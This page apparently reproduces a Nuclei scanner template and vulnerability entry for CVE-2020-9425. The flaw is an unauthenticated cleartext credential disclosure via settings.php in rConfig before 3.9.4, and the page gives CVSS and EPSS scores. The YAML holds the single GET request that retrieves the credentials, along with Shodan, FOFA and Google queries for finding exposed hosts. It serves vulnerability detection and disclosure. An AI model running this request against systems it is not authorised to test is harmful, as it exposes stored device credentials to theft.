Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-9425
HistoryFeb 14, 2021 - 7:43 p.m.

rConfig <3.9.4 - Sensitive Information Disclosure

2021-02-1419:43:33
ProjectDiscovery
github.com
2

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.2 High

AI Score

Confidence

High

0.014 Low

EPSS

Percentile

86.8%

rConfig prior to version 3.9.4 is susceptible to sensitive information disclosure. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application does not exit after a redirect is applied, the rest of the page still executes, resulting in the disclosure of cleartext credentials in the response.

id: CVE-2020-9425

info:
  name: rConfig <3.9.4 - Sensitive Information Disclosure
  author: madrobot
  severity: high
  description: rConfig prior to version 3.9.4 is susceptible to sensitive information disclosure. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application does not exit after a redirect is applied, the rest of the page still executes, resulting in the disclosure of cleartext credentials in the response.
  impact: |
    An attacker can exploit this vulnerability to gain access to sensitive information, such as usernames and passwords.
  remediation: |
    Upgrade rConfig to version 3.9.4 or later to fix the vulnerability.
  reference:
    - https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153
    - https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9425
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-9425
    cwe-id: CWE-670
    epss-score: 0.01336
    epss-percentile: 0.86037
    cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: rconfig
    product: rconfig
    shodan-query: http.title:"rconfig"
    fofa-query: title="rconfig"
    google-query: intitle:"rconfig"
  tags: cve,cve2020,rconfig.exposure,rconfig

http:
  - method: GET
    path:
      - "{{BaseURL}}/settings.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "defaultNodeUsername"
          - "defaultNodePassword"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100cdcfd569e8342f214eb384f124611a6176542f3db24e58173519e4add35dcc5e022100dbd0609f9302f7b23418fde669ceac781a5db1d080949ab0f1ba6abf680dfeb4:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.2 High

AI Score

Confidence

High

0.014 Low

EPSS

Percentile

86.8%

Related for NUCLEI:CVE-2020-9425